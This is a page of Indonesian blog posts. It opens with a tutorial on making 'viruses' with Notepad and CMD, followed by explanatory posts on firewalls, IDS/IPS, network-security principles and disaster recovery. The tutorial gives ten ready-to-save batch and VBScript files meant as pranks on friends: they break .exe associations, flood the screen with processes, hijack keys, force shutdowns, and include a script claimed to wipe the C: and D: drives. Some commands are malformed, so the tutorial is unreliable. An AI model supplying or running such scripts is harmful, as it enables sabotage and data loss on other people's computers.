Cara Membuat Virus Menggunakan Notepad dan CMD-

Cara Membuat Virus Menggunakan Notepad dan CMD

Cara Membuat Virus Menggunakan Notepad dan CMD- Nah sobat kali ini saya akan share cara membuat virus menggunakan notepad dan cmd. Virus ini bisa digunakan untuk ngerjain teman dan ada juga yang cukup berbahaya sobat, saya share ini hanya sekedar ingin berbagi pengetahuan kepada sobat sekalian, siapa tau berguna dan bermanfaat bagi sobat dan supaya sobat juga tau kalau notepad dan cmd bawaan dari windows bisa digunakan untuk membuat virus. oke sobat, langsung akan saya jelaskan...

1. Saya akan menjelaskan cara membuat virus menggunakan CMD : Buka program cmd nya melalui klik start - run - ketik cmd atau bisa melalui keyboard dengan mengetik key windows + R lalu ketik cmd dan dan tekan enter lalu ketikan script berikut di cmd "ASSOC.exe=.hank" tanpa tanda petik lalu tekan enter! nah, ini membuat program/aplikasi yang berexstensi .exe tidak mau jalan, seperti game, dll. Tapi tenang, ini bisa dikembalikan seperti semuala dengan cara buka cmd nya lagi lalu ketik "ASSOC.exe=EXEFILE" trik ini bisa untuk ngerjain teman sobat, ya cuma buat iseng-iseng.

2. Sekarang saya akan menjelaskan cara membuat virus menggunakan Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke notepad : 

------

start

start

start

start

start

start

start

start

start

start

start

start

------

Nah, selanjutnya simpan di notepad dengan nama apa saja dengan exstensi .bat contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini membuat komputer menjadi eror, karena akan membuka CMD yang banyak jika file "eror.bat" itu di buka.

3. Masih di notepad, sekarang saya akan jelaskan cara membuat notepad terbuka secara otomatis, silahkan ketik/ copas kode script berikut ke notepad :

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top

Simpan di notepad dengan nama apa saja dengan exstensi .bat sama seperti yang tadi, contoh "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini akan membuat notepad terbuka dengan sendirinya secara otomatis.

4. Masih menggunakan notepad, yang sekarang cara membuat tombol backspace menjadi eror menekan terus menerus secara otomatis, langsung saja copas/ketik kode script berikut ke notepad : 

MsgBox "kembali ke menu sebelumnya"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop

Simpan kode script tersebut di notepad dengan nama apa saja yang penting tidak lupa menuliskan exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini membuat tombol backspace menjadi eror dan menekan dengan sendiri nya.

5. Masih menggunakan notepad, trik sekarang bisa membuat CD/DVD Room buka tutup dengan sendiri nya, langsung aja copas/ketik kode script berikut ke notepad : 

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop

Simpan kode tersebut di notepad dengan nama bebas dan tambahkan exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadi All Files, maka akan bisa membuat CD/DVD Room buka tutup dengan sendirinya secara otomatis.

6. Trik kali ini bisa membuat Caps Lock menyala terus menerus tak terkendali, langsung saja copas/ketik kode script berikut di notepad : 

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika File ini di buka akan membuat Caps Lock menyala terus menerus.

7. Trik yang ke tujuh, membuat komputer menjadi shoutdown dengan kata lain mati, langsung saja ini script nya copas ke notepad : 

@echo off

msg * I don't like you

shutdown -c "Error! You are too ******!" -s

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika file ini di buka akan membuat komputer shoutdown atau mati.

8.Trik yang ini sama dengan trik yang nomor 7 hanya saja yang ini isi waktu, langsung saja copas/ketik kode script berikut ke notepad : 

@echo shutdown -s -t 1 -f 

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .bat lain dengan trik yang no 7, contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Maka jika file ini dibuka akan sama dengan no 7 yaitu membuat komputer Shoutdown, hanya saja yang membedakan adalah yang ini berisi waktu, lihat angka pada kode script tersebut yang berwarna biru, itu adalah waktu yang dibutuhkan untuk mematikan komputer, bisa di atur sesuai keinginan (1 = 1 detik)

9. Kali ini trik yang lumayan berbahaya, karena komputer akan dipenuhi oleh 100000000  

tourstart yang akan memenuhi layar monitor dan akan membuat komputer menjadi hang,  

untuk mengatasinya dapat mendelete semua tourstart tersebut atau langsung merestart 

komputer. Silahkan copas/ketik kode script berikut ke notepad : 

option explicit 

dim wshshell 

set wshshell=wscript.createobject(“wscript.shell”) 

dim x 

for x = 1 to 100000000 

wshshell.run “tourstart.exe” 

next

Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs" tanpa tanda kutip dan Save As type ganti menjadi All Files. Pada angka yang saya beri wara biru, itu bisa di ganti sesuai keinginan, bisa dibuat menjadi 100 atau 1000 saja, dan begitu file ini dibuka akan membuat tourstart sesuai dengan angka yang ditulis pada kode tesebut,

10. Nah Yang terakhir ini, saya rasa paling berbayaha, karena dapat menghapus seluruh data di hardisk tanpa terkecuali, sehingga mau tidak mau ya harus instal ulang, langsung saja copas/ketik kode script berikut di notepad : 

@echo off
DEL C: -Y
DEL D: -Y

Simpan dengan nama bebas dan exstensi .bat contoh "virus.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK karena bisa berakibat fatal bagi komputer anda.

Oke..itulah beberapa cara membuat virus menggunakan notepad dan cmd, agar dapat dipergunakan dengan baik, dan agar sobat dapat berhati-hati jika melihat ada file di komputer sobat yang berexstensi .bat atau .vbs siapa tau teman atau orang dekat sobat iseng-iseng ngerjain...

Sumber : http://dikaeuphrosyne.blogspot.co.id/2013/04/cara-membuat-virus-menggunakan-notepad.html

Step by Step Konfigurasi Mikrotik Firewall ( Filter, Block Client, Block Mac Addres, Block Attacker, dll )

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Firewall Adalah | Pengertian, Fungsi, Manfaat & Cara Kerja Firewall

Assalamu'alaikum wr.wb

Firewall adalah perangkat yang digunakan untuk mengontrol akses terhadap siapapun yang memiliki akses terhadap jaringan privat dari pihak luar. Saat ini, pengertian firewall difahami sebagai sebuah istilah generik yang merujuk pada fungsi firewall sebagai sistem pengatur komunikasi antar dua jaringan yang berlainan.

Mengingat sekarang ini banyak perusahaan yang memiliki akses keInternet maka perlindungan terhadap aset digital perusahaan tersebut dari serangan para hacker, pelaku spionase, ataupun pencuri data lainnya, sehingga fungsi firewall menjadi hal yang sangat esensial.”

Yuk kita simak pembahasan secara detail Pengertian Firewall serta fungsi dan cara kerja Firewall!!!

Pengertian Firewall

Firewall adalah sistem keamanan jaringan komputeryang digunakan untuk melindungi komputer dari beberapa jenis serangan dari komputer luar.

Menurut Wabopedia.comDefinisi Firewalladalah sebuah sistem yang didesain untuk mencegahakses yang tidak sah ke atau dari jaringan pribadi (Privat Network). Firewall dapat diimplementasikan dalamperangkat keras dan perangkat lunak, atau kombinasikeduanya. Firewall sering digunakan untuk mencegahpengguna Internet yang tidak saheng mengakses jaringanpribadi yang terhubung ke Internet, terutama intranet.Semua pesan masuk atau keluar dari intranet melewatifirewall, filewall bertindak sebagai pengawas (controller) setiap pesan dan memblok jika tidakmemenuhi kriteria keamanan tertentu.

menurut Pengertian Firewallyang dimaksudkan diatas, firewall adalah sebuah sistem atau perangkat yang memberi otorisasi pada lalu lintas jaringan komputeryang dianggapnya aman untuk melaluinya dan melakukan pencegahan terhadapa jaringan yang dianggap tidak aman. Firewall dapat berupa perangkat lunak (program komputer atau aplikasi) atau perangkat keras (peralatan khusus untuk menjalankan program fire-wall) perangkat yang menyaring lalu lintas jaringan antara jaringan. Perlindungan dengn Firewall adalah mutlak diperlukan untuk komputasi perangkat seperti komputer yang diaktifkan dengan koneksi Internet. Meningkatkan tingkat keamanan jaringan komputer dengan memberikan informasi rinci tentang pola-pola lalu lintas jaringan. Perangkat ini penting dan sangat diperlukan karena bertindak sebagai gerbang keamanan antara jaring komputer internal dan jaringan komputer eksternal.

“Fungsi Firewall Adalah”

Sebelum memahami fungsi firewall mari kita fahami atribut pentingnya sbb:

• Semua jaringan komunikasi melewati fire wall
• Hanya lalu lintas resmi diperbolehkan oleh fire wall
• Memiliki kemampuan untuk menahan serangan Internet

Fungsi firewall sebagai pengontrol, mengawasi arus paket data yang mengalir di jaringan. Fungsi Firewal mengatur, memfilter dan mengontrol lalu lintas data yang diizinkan untuk mengakses jaringan privat yang dilindungi, beberapa kriteria yang dilakukan fire-wall apakah memperbolehkan paket data lewati atau tidak, antara lain :

• Alamat IP dari komputer sumber
• Port TCP/UDP sumber dari sumber.
• Alamat IP dari komputer tujuan.
• Port TCP/UDP tujuan data pada komputer tujuan
• Informasi dari header yang disimpan dalam paket data.

secara sfesifik Fungsi Firewall adalah melakukan autentifikasi terhadap akses kejaringan. Applikasi proxy Fire-wall mampu memeriksa lebih dari sekedar header dari paket data, kemampuan ini menuntutnya untuk mampu mendeteksi protokol aplikasi tertentu yang spesifikasi.

“Manfaat Firewall Adalah”

• Manfaat firewall  adalah untuk menjaga informasi rahasia dan berharga yang menyelinap keluar tanpa sepengetahuan. Sebagai contoh, FTP (File Transfer Protocol) lalu lintas dari jaringan komputer organisasi dikendalikan oleh fire-wall. Hal ini dilakukan untuk mencegah pengguna di jaringan mengirim file rahasia yang disengaja atau tidak sengaja kepada pihak lain.
• Manfaat Firewall sebagai filter juga digunakan untuk mencegah lalu lintas tertentu mengalir ke subnet jaringan. Hal ini mencegah pengguna berbagi file, dan bermain-main di jaringan.Aplikasi jenis ini berguna terutama dalam sektor korporasi.
• Manfaat firewall lainnya adalah untuk memodifikasi paket data yang datang di fire-wall. Proses ini disebut Network Address Translation (NAT). Ada jenis NAT disebut NAT dasar, di mana alamat IP (Internet Protocol) pribadi dari jaringan komputer yang tersembunyi di balik satu alamat IP tertentu. Proses ini disebut sebagai IP samaran. Hal ini membantu pengguna dalam sebuah jaringan yang meliputi sistem tanpa nomor IP publik yang beralamat, untuk mengakses Internet.
• Akurasi data seperti informasi keuangan, spesifikasi produk, harga produk dll, sangat penting bagi setiap perkembangan bisnis. Jika informasi tersebut diubah oleh sumber eksternal, maka akan memberikan dampak merugikan. Manfaat Firewalldisini adalah mencegah modifikasi data yang tidak sah di website .

Jika sistem tidak tersedia bagi pengguna secara tepat waktu, maka halini akan menyebabkan penurunan produktivitas karyawan, kehilangan kepercayaan konsumen, dan publisitas yang buruk. Fire-wall memastikan ketersediaan sistem.

Cara Kerja Firewall Adalah ?

Bagaimana cara kerja firewall?. Komputer memiliki ribuan port yang dapat diakses untuk berbagai keperluan.  Cara Kerja Firewall dari komputer adalah menutup port kecuali untuk beberapa port tertentu yang perlu tetap terbuka.  Firewall di komputer bertindak sebagai garis pertahanan terdepan dalam mencegah semua jenis hacking ke dalam jaringan, karena, setiap hacker yang mencoba untuk menembus ke dalam jaringan komputer akan mencari port yang terbuka yang dapat diaksesnya.

Firewall dapat berupa perangkat keras atau perangkat lunak namun cara kerja firewall optimal bila kedua jenis perangkat digabungkan. Selain membatasi akses ke jaringan komputer, firewall juga memungkinkan akses remote ke jaringan privat melalui  secure authentication certificates and logins (sertifikat keamanan otentikasi  dan login).
Hardware firewall dapat dibeli sebagai produk yang berdiri sendiri, tetapi  biasanya pada router broadband ditemukan , dan seharusnya dilakukan setting pada perangkat ini untuk akses ke jaringan komputer. Kebanyakan hardware firewall  adalah memiliki minimal empat port jaringan untuk menghubungkan komputer lain,

Teknologi firewall saat ini sudah sangat canggih. Sebelumnya, cara kerja firewall adalah dengan menyaring lalu lintas jaringan yang menggunakan alamat IP, nomor port, dan protokol, tapi saat ini fire-wall dapat menyaring data dengan mengidentifikasi pesan konten itu sendiri. Dengan bantuan fire-wall, informasi sensitif atau tidak layak dapat dicegah melalui interface. Pastikan sistem keamanan jaringan di lapisi firewall

Apa itu IDS dan IPS dalam keamanan jaringan

Assalamu'alaikum wr.wb

Dua minggu yang lalu saya mendapatkan tugas oleh dosen mata kuliah Keamanan Jaringan, yaitu untuk mencari tahu mengenai IDS dan IPS, terkait dengan keamanan pada suatu warung internet. Setelah saya mencari berbagai referensi dari internet, akhirnya saya dapat memahami apa itu Intrusion Detection System (IDS) dan Intrusion Prevention System (IPS). Bagi Anda yang belum mengetahui apa itu IDS dan IPS, Anda dapat membacanya..^^

Intrusion Detection System

adalah sebuah aplikasi perangkat lunak atau perangkat keras yang dapat mendeteksi aktivitas yang mencurigakan dalam sebuah sistem atau jaringan. IDS dapat melakukan inspeksi terhadap lalu lintas inbound dan outbound dalam sebuah sistem atau jaringan, melakukan analisis dan mencari bukti dari percobaan intrusi (penyusupan).

- Ada dua jenis IDS, yakni:

1. Network-based Intrusion Detection System (NIDS): Semua lalu lintas yang mengalir ke sebuah jaringan akan dianalisis untuk mencari apakah ada percobaan serangan atau penyusupan ke dalam sistem jaringan. NIDS umumnya terletak di dalam segmen jaringan penting di mana server berada atau terdapat pada "pintu masuk" jaringan. Kelemahan NIDS adalah bahwa NIDS agak rumit diimplementasikan dalam sebuah jaringan yang menggunakan switch Ethernet, meskipun beberapa vendor switch Ethernet sekarang telah menerapkan fungsi IDS di dalam switch buatannya untuk memonitor port atau koneksi.

2.Host-based Intrusion Detection System (HIDS): Aktivitas sebuah host jaringan individual akan dipantau apakah terjadi sebuah percobaan serangan atau penyusupan ke dalamnya atau tidak. HIDS seringnya diletakkan pada server-server kritis di jaringan, seperti halnya firewall, web server, atau server yang terkoneksi ke Internet.

Kebanyakan produk IDS merupakan sistem yang bersifat pasif, mengingat tugasnya hanyalah mendeteksi intrusi yang terjadi dan memberikan peringatan kepada administrator jaringan bahwa mungkin ada serangan atau gangguan terhadap jaringan. Akhir-akhir ini, beberapa vendor juga mengembangkan IDS yang bersifat aktif yang dapat melakukan beberapa tugas untuk melindungi host atau jaringan dari serangan ketika terdeteksi, seperti halnya menutup beberapa port atau memblokir beberapa alamat IP. Produk seperti ini umumnya disebut sebagai Intrusion Prevention System (IPS). Beberapa produk IDS juga menggabungkan kemampuan yang dimiliki oleh HIDS dan NIDS, yang kemudian disebut sebagai sistem hibrid (hybrid intrusion detection system).

- Implementasi dan Cara Kerja :

Ada beberapa cara bagaimana IDS bekerja. Cara yang paling populer adalah dengan menggunakan pendeteksian berbasis signature (seperti halnya yang dilakukan oleh beberapa antivirus), yang melibatkan pencocokan lalu lintas jaringan dengan basis data yang berisi cara-cara serangan dan penyusupan yang sering dilakukan oleh penyerang. Sama seperti halnya antivirus, jenis ini membutuhkan pembaruan terhadap basis data signature IDS yang bersangkutan.

Metode selanjutnya adalah dengan mendeteksi adanya anomali, yang disebut sebagai Anomaly-based IDS. Jenis ini melibatkan pola lalu lintas yang mungkin merupakan sebuah serangan yang sedang dilakukan oleh penyerang. Umumnya, dilakukan dengan menggunakan teknik statistik untuk membandingkan lalu lintas yang sedang dipantau dengan lalu lintas normal yang biasa terjadi. Metode ini menawarkan kelebihan dibandingkan signature-based IDS, yakni ia dapat mendeteksi bentuk serangan yang baru dan belum terdapat di dalam basis data signature IDS. Kelemahannya, adalah jenis ini sering mengeluarkan pesan false positive. Sehingga tugas administrator menjadi lebih rumit, dengan harus memilah-milah mana yang merupakan serangan yang sebenarnya dari banyaknya laporan false positive yang muncul.

Teknik lainnya yang digunakan adalah dengan memantau berkas-berkas sistem operasi, yakni dengan cara melihat apakah ada percobaan untuk mengubah beberapa berkas sistem operasi, utamanya berkas log. Teknik ini seringnya diimplementasikan di dalam HIDS, selain tentunya melakukan pemindaian terhadap log sistem untuk memantau apakah terjadi kejadian yang tidak biasa.

Intrusion Prevention System

merupakan kombinasi antara fasilitas blocking capabilities dari Firewall dan kedalaman inspeksi paket data dari Intrusion Detection System (IDS). IPS diciptakan pada awal tahun 1990-an untuk memecahkan masalah serangan yang selalu melanda jaringan komputer. IPS membuat akses kontrol dengan cara melihat konten aplikasi, dari pada melihat IP address atau ports, yang biasanya dilakukan oleh firewall. IPS komersil pertama dinamakan BlackIce diproduksi oleh perusahaan NetworkIce, hingga kemudian berubah namanya menjadi ISS(Internet Security System). Sistem setup IPS sama dengan sistem setup IDS. IPS mampu mencegah serangan yang datang dengan bantuan administrator secara minimal atau bahkan tidak sama sekali. Secara logic IPS akan menghalangi suatu serangan sebelum terjadi eksekusi dalam memori, selain itu IPS membandingkan file checksum yang tidak semestinya mendapatkan izin untuk dieksekusi dan juga bisa menginterupsi sistem call.

>

- Jenis-jenis IPS :

a. Host-based Intrusion Prevention System
Host Based IPS (HIPS) bekerja dengan memaksa sekelompok perangkat lunak fundamental untuk berkovensi secara konstan. Hal ini disebut dengan Application Binary Interface (ABI). Hampir tidak mungkin untuk membajak sebuah aplikasi tanpa memodifikasi Application Binary Interface, karena konvensi ini bersifat universal di antara aplikasi-aplikasi yang dimodifikasi.

HIPS merupakan sebuah system pecegahan yang terdiri dari banyak layer, menggunakan packet filtering, inspeksi status dan metode pencegahan intrusi yang bersifat real-time untuk menjaga host berada di bawah keadaan dari efisiensi performansi yang layak. Mekanisme kerjanya yaitu dengan mencegah kode-kode berbahaya yang memasuki host agar tidak dieksekusi tanpa perlu untuk mengecek threat signature.

b. Network Intrusion Prevention System
Network Based IPS (NIPS), yang juga disebut sebagai “In-line proactive protection”, menahan semua trafik jaringan dan menginspeksi kelakuan dan kode yang mencurigakan.
Karena menggunakan in-line model, performansi tinggi merupakan sebuah elemen krusial dari perangkat IPS untuk mencegah terjadinya bottleneck pada jaringan. Oleh karena itu, NIPS biasanya didesain menggunakan tiga komponen untuk mengakselerasi performansi bandwidth, yaitu :

1. Network Chips (Network processor)
2. FPGA Chips
3. ASIC Chips

Network Based IPS (NIPS) biasanya dibangun dengan tujuan tertentu, sama halnya dengan switch dan router.Beberapa teknologi sudah diterapkan pada NIPS, seperti signature matching, analisa protocol dan kelainan pada protocol, identifikasi dari pola trafik, dan sebagainya. NIPS dibuat untuk menganalisa, mendeteksi, dan melaporkan seluruh arus data dan disetting dengan konfigurasi kebijakan keamanan NIPS, sehingga segala serangan yang datang dapat langsung terdeteksi. Kebijakan keamanan NIPS sendiri terdiri dari:

Content based Intrusion Prevention System, yang bertugas mengawasi isi dari paket-paket yang berlalu lalang dan mencari urutan yang unik dari paket-paket tersebut, berisi virus worm, trojan horse,dll.

Rate based Intrusion Prevention System, bertugas mencegah dengan cara memonitor melalui arus lalu lintas jaringan dan dibandingkan dengan data statistic yang tersimpan dalam database. Apabila RBIPS mengenali paket-paket yang tidak jelas, maka langsung mengkarantina paket tersebut.
Baik host based maupun network IPS memiliki kelebihan dan kekurangannya masing-masing. HIPS dapat mengatasi semua jenis jaringan yang terenkripsi dan dapat menganalisa semua kode, sedangkat NIPS tidak menggunakan prosesor dan memori di client maupun host. NIPS tidak selalu bagus, kadang bisa gagal dalam mendeteksi serangan, kadang bisa langsung mendeteksi serangan. Keuntungan NIPS adalah administrasinya yang gampang.

- Cara Kerja IPS :

Formula yang umum digunakan untuk mendefinisikan IPS adalah: IPS = IDS + Firewall.

Penjelasan :

Firewall merupakan sebuah system yang menerapkan sebuah kebijakan kontrol akses yang memeriksa trafik data yang lalu lalang dan memblok paket data yang tidak sesuai dengan kebijakan keamanan. Sebuah Intrusion Detection System (IDS) memonitor performansi system atau jaringan, mencari pola tingkah laku yang tidak sesuai dengan kebijakan keamanan atau tanda-tanda serangan yang dapat dikenali, dan kemudian jika ditemukan maka IDS akan memicu alarm. Di sini, firewall akan menolak serangan yang sudah pasti/jelas, sementara trafik yang mencurigakan akan dibiarkan lewat. Di sisi lain, IDS memonitor semua data di dalam jaringan, memberitahukan administrator jaringan akan adanya serangan pada saat serangan mulai ‘hidup’ dan berada di dalam jaringan. Dengan kata lain, baik IDS maupun firewall tidak mampu memblokir serangan ketika intrusi benar-benar telah terjadi.

Lebih jauh lagi, IPS sebenarnya lebih dari sekedar IDS + firewall. IPS didesain sebagai sebuah embedded system yang membuat banyak filter untuk mencegah bermacam-macam serangan seperti hacker, worm, virus, Denial of Service (DoS) dan trafik berbahaya lainnya, agar jaringan enterprise tidak menderita banyak kerugian bahkan ketika security patch terbaru belum diterapkan. Pembangunan IPS didasarkan pada sebuah modul “in-line”: data melewati perangkat IPS dari satu ujung dari kanal data tunggal, hanya data yang sudah dicek dan divalidasi oleh mesin IPS yang diperbolehkan untuk lewat menuju ujung lain dari kanal data. Pada scenario ini, paket yang mengandung tanda-tanda serangan pada paket asalnya akan dibersihkan dari jaringan.
Penggunaan multiple filter pada IPS membuatnya secara signifikan lebih efektif ketika menginspeksi, mengidentifikasi dan memblokir serangan berdasarkan urutan waktu. IPS membuat filter baru ketika sebuah metode serangan baru diidentifikasi. Mesin inspeksi paket data IPS normalnya terdiri dari integrated circuit yang didesain untuk inspeksi data mendalam. Setiap serangan yang mencoba mengeksploitasi kelemahan dari layer 2 sampai layer 7 OSI akan difilter oleh mesin IPS yang mana, secara tradisional, kemampuan firewall hanya terbatas sampai modul 3 atau 4 saja. Teknologi packet-filter dari firewall tradisional tidak menerapkan inspeksi untuk setiap byte dari segmen data yang bermakna tidak semua serangan dapat diidentifikasikan olehnya. Secara kontras, IPS mampu melakukan inspeksi tersebut dan semua paket data diklasifikasikan dan dikirim ke filter yang sesuai menurut informasi header yang ditemukan di segmen data, seperti alamat asal, alamat tujuan, port, data field dan sebagainya. Setiap filter bertanggung jawab untuk menganalisis paket-paket yang berkaitan, dan yang mengandung tanda-tanda membahayakan akan didrop dan jika dinyatakan tidak berbahaya akan dibiarkan lewat. Paket yang belum jelas akan diinspeksi lebih lanjut. Untuk setiap tipe serangan berbeda, IPS membutuhkan sebuah filter yang bersesuaian dengan aturan filtering yang sudah ditentukan sebelumnya. Aturan-aturan ini mempunyai definisi luas untuk tujuan akurasi, atau memastikan bahwa sebisa mungkin jangkauan aktifitas yang luas dapat terenkapsulasi di dalam sebuah definisi. Ketika mengklasifikasikan sebuah aliran data, mesin filter akan mengacu pada informasi segmen paket, menganalisa konteks dari field tertentu dengan tujuan untuk mengimprovisasi akurasi dari proses filtering.

KONSEP DASAR KEAMANAN JARINGAN

Assalamu'alaikum wr.wb

Keamanan jaringan komputer sebagai bagian dari sebuah sistem informasi adalah sangat penting untuk menjaga validitas dan integritas data serta menjamin ketersediaan layanan begi penggunanya. Sistem harus dilindungi dari segala macam serangan dan usaha penyusupan atau pemindaian oleh pihak yang tidak berhak.

Komputer yang terhubung ke jaringan mengalami ancaman keamanan yang lebih besar daripada host yang tidak terhubung kemana-mana. Dengan mengendalikan network security, resiko tersebut dapat dikurangi. Namun network security biasanya bertentangan dengan network acces, karena bila network acces semakin mudah, network security makin rawan. Bila network security makin baik, network acces semakin tidak nyaman. Suatu jaringan didesain sebagai komunikasi data highway dengan tujuan meningkatkan akses ke sistem komputer, sementara keamanan didesain untuk mengontrol akses. Penyediaan network security adalah sebagai aksi penyeimbang antara open acces dengan security.

Prinsip Dasar Keamanan Jaringan

Prinsip keamanan jaringan dapat dibedakan menjadi tiga, yaitu :

a. Kerahasiaan (secrecy)

Secrecy berhubungan dengan hak akses untuk membaca data ,informasi dan suatu sistem computer. Dalam hal ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi hanya dapat dibaca oleh pihak yang telah diberi wewenang secara legal.

b.  Integritas (integrity)

Integrity berhubungan dengan hak akses untuk mengubah data atau informasi dari

suatu sistem komputer. Dalam hal ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi hanya dapat diubah oleh pihak yang telah diberi hak.

Contoh : e-mail di intercept di tengah jalan, diubah isinya, kemudian diteruskan ke alamat yang dituju.dengan cara  virus, trojan horse, atau pemakai lain yang mengubah informasi tanpa ijin, “man in the middle attack” dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain.

c.   Ketersediaan (availability)

Availability berhubungan dengan ketersediaan data atau informasi pada saat yang dibutuhkan. Dalam hal ini suatu sistem komputer dapat dikatakan aman jika suatu data atau informasi yang terdapat pada sistem komputer dapat diakses dan dimanfaatkan oleh pihak yang berhak.

d.  Authentication

Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi betul- betul asli, orang yang mengakses dan memberikan informasi adalah benar orang yang dimaksud, atau server yang kita hubungi adalah server yang asli.

e.   Akses Kontrol

Aspek kontrol merupakan fitur-fitur keamanan yang mengontrol bagaimana user berkomunikasi dengan sistem. Akses kontrol melindungi sistem dari akses yang tidak berhak dan umumnya menentukan tingkat otorisasi setelah prosedur otentikasi berhasil dilengkapi.

PERANCANGAN KEAMANAN JARINGAN

Dalam merencanakan suatu keamanan jaringan, ada beberapa metode yang dapat ditetapkan, metode-metode tersebut adalah sebagai berikut :

1.       Pembatasan akses pada suatu jaringan

a.    Internal Password Authentication: Password local untuk login ke sistem harus merupakan password yang baik serta dijaga dengan baik.

b.    Server Based password authentication: setiap service yang disediakan oleh server tertentu dibatasi dengan suatu daftar host dan user yang boleh dan tidak boleh menggunakan service tersebut

c.    Server-based token authentication : penggunaan token / smart card, sehingga untuk akses tertentu hanya bisa dilakukan oleh login tertentu dengan menggunakan token khusus.

d.    Firewall dan Routing Control : Firewall melindungi host-host pada sebuah network dari berbagai serangan.

2.    Menggunakan Metode dan mekanisme tertentu

a.    Enkripsi : Proses enkripsi meng-encode data dalam bentuk yang hanya dapat dibaca oleh sistem yang mempunyai kunci untuk membaca data.

b.    Terminologi Kriptografi : Sebuah algoritma kriptografik (cryptographic algorithm), disebut cipher, merupakan persamaan matematik yang digunakan untuk proses enkripsi dan dekripsi.

c.  Terminologi Enskripsi – Dekripsi : Proses yang dilakukan untuk mengamankan sebuah pesan (yang disebut plaintext) menjadi pesan yang tersembunyi (disebut ciphertext) adalah enkripsi (encryption). untuk mengubah ciphertext menjadi plaintext, disebut dekripsi (decryptionü Digital Signature : digunakan untuk menyediakan authentication, perlindungan, integritas, dan non-repudiation

d. Algoritma Checksum/Hash : Digunakan untuk menyediakan perlindungan integritas, dan dapat menyediakan authentication. Satu atau lebih mekanisme dikombinasikan untuk menyediakan security service

3.    Pemonitoran terjadwal terhadap jaringan

Dengan adanya pemantauan yang teratur, maka penggunaan sistem oleh yang tidak berhak dapat dihindari/cepat diketahui. Untuk mendeteksi aktifitas yang tidak normal, maka perlu diketahui aktifitas yang normal. Proses apa saja yang berjalan pada saat aktifitas normal. Siapa saja yang biasanya login pada saat tersebut. Siapa saja yang biasanya login diluar jam kerja. Bila terjadi keganjilan, maka perlu segera diperiksa. Bila hal-hal yang mencurigakan terjadi, maka perlu dijaga kemungkinan adanya intruder.

Beberapa Langkah dalam perancangan Sistem dengan memperhatikan aspek Keamanan Jaringan :

1.    Menentukan topologi jaringan yang akan digunakan.

2.    Menentukan kebijakan atau policy .

3.    Menentukan aplikasi – aplikasi atau servis-servis apa saja yang akan berjalan.

4.    Menentukan pengguna-pengguna mana saja yang akan dikenakan oleh satu atau lebih aturan firewall.

5.    Menerapkan kebijakan, aturan, dan prosedur dalam implementasi firewall.

6.    Sosialisasi kebijakan, aturan, dan prosedur yang sudah diterapkan.

JENIS-JENIS SISTEM KEAMANAN JARINGAN KOMPUTER

Sebuah jaringan komputer harus memiliki untuk menghindari berbagai macam serangan oleh para hacker/cracker. Bagi para administrator jaringan pun harus jeli dalam menggunakan jenis sistem keamanan yang digunakan. Pada dasarnya jenis keamanan dibagi menjadi 5 jenis, yaitu:

1.    Keamanan fisik

Keamanan fisik lebih ditekankan pada hardware. Hal ini digunakan untuk melindungi hardware tetap dalam kondisi baik untuk melakukan operasi pada jaringan.

2.    Kemanan jaringan

Keamanan jenis ini lebih bertipe ke abstrak. Jadi kemanan ini dilakukan oleh benda yang tidak tampak, baik itu menggunakan software atau perintah lainnya. Contoh pengamanan jaringan adalah dengan menggunakan firewall ataupun proxy yang digunakan untuk mem filter user yang akan menggunakan jaringan.

3.    Otorisasi akses

Otorisasi akses adalah penggunaan password atau kata sandi jika kita ingin mengakses sesuatu di jaringan. Hal ini dimaksudkan untuk memastikan hanya user tertentu saja yang diperbolehkan untuk mengakses jaringan.

4.    Proteksi Virus

Virus adalah sebuah metode penyerangan sistem komputer dengan menggunakan sebuah program yang dapat membuat sistem kacau dan mengalami kerusakan. Virus sendiri bisa diatasi dengan menginstall antivirus pada komputer dan selalu update databasenya yang terbaru.

5.    Penanganan bencana

Perencanaan bencana adalah Perencanaan langkah-langkah yang akan diambil jika terjadi bencana yang mengakibatkan rusaknya sebuah sistem dan hilangnya data-data penting. Hal ini dimaksudkan agar kerusakan pada sistem lebih cepat teratasi.

DISASTER RECOVERY PLANNING

Disaster recovery plan merupakan sebuah prosedur  penyelamatan dan pemulihan khususnya fasilitas IT dan sistem informasi yang  berisikan tindakan-tindakan konsisten yang harus dilakukan sebelum, selama, dan setelah adanya kejadian (bencana) yang mengakibatkan hilangnya sumber daya sistem informasi.

Menurut Rosenberg (2006:4) ada 10 langkah dalam menjalankan Disaster Recovery Plan, yaitu:

1.    Define key Assets, Threats and Scenarios

Langkah pertama dalam pembuatan DRP adalah mengidentifikasi aset-aset penting organisasi dan dampak apa yang ditimbulkan apabila aset tersebut hilang. Contoh aset yang seharusnya dilindungi adalah E-mail beserta archive, File dan dokumen yang ada di jaringan LAN, Desain dan spesifikasi produk, Employee knowledge, Sistem accounting beserta komponen-komponennya

